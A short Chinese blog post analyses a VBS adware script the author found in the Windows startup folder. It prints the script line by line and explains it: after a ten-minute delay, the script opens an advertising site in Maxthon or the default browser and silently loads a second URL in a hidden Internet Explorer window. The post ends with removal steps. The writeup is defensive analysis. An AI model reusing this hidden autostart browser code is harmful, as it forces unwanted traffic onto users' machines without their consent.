自动弹出网页的恶意脚本分析
by:riusksk
blog:http://riusksk.blogbus.com
这几天在开机后,都会自动弹出一个广告网站,在注册表中搜索弹出的网页,无果而返,接着再看了一下启动项,发现个VBS脚本文件,如下图:
找到这个脚本文件后,用记事本打开,代码如下:
00000: On Error Resume Next
00001: Dim Fso,wss,HKRegStr
00002: Set Fso= CreateObject("Scripting.FileSystemObject")
00003: Set wss=CreateObject("WScript.Shell")
00004: HKRegStr=wss.RegRead("HKEY_CURRENT_USERSoftwareMaxthon2Folder")
00005: if HKRegStr<>"" then
00006: HKRegStr=HKRegStr+"Maxthon.exe" 默认使用傲游浏览器打开网站
00007: if (Fso.FileExists(HKRegStr)) then
00008: wscript.sleep 600000 脚本运行10分钟之后再打开网站
00009: 网址之家.url是一个快捷方式文件,指向http://www.so02.cn/?sid=1,如下图所示:
00010: CreateObject("WScript.Shell").run """" & HKRegStr &""" C:Windowssystem32网址之家.url",x,ture
00011: set ie=WScript.createobject("internetexplorer.application")
00012: ie.visible = 0
00013: ie.navigate "http://qw.ad29.com/ji.asp" 接着再打开这个网址
00014: wscript.sleep 10000 暂时10秒
00015: ie.quit
00016: else
00017: 假如没有注册表中指定的Maxthon.exe,则用默认浏览器打开网址之家.url,也就是http://www.so02.cn/?sid=1
00018: wscript.sleep 600000
00019: CreateObject("WScript.Shell").run" C:Windowssystem32网址之家.url",x,ture
00020: end if
00021: else
00022: 假如注册表HKEY_CURRENT_USERSoftwareMaxthon2Folder无键值,则10分钟后打开网址之家.url
00023: wscript.sleep 600000
00024: CreateObject("WScript.Shell").run "C:Windowssystem32网址之家.url" ,x,ture
00025: end if
清除方法:去掉启动项中的网址之家.vbs并将其删除,再将 C:Windowssystem32网址之家.url 也清除,重启之后搞定。
补充:综合编程 , 安全编程 ,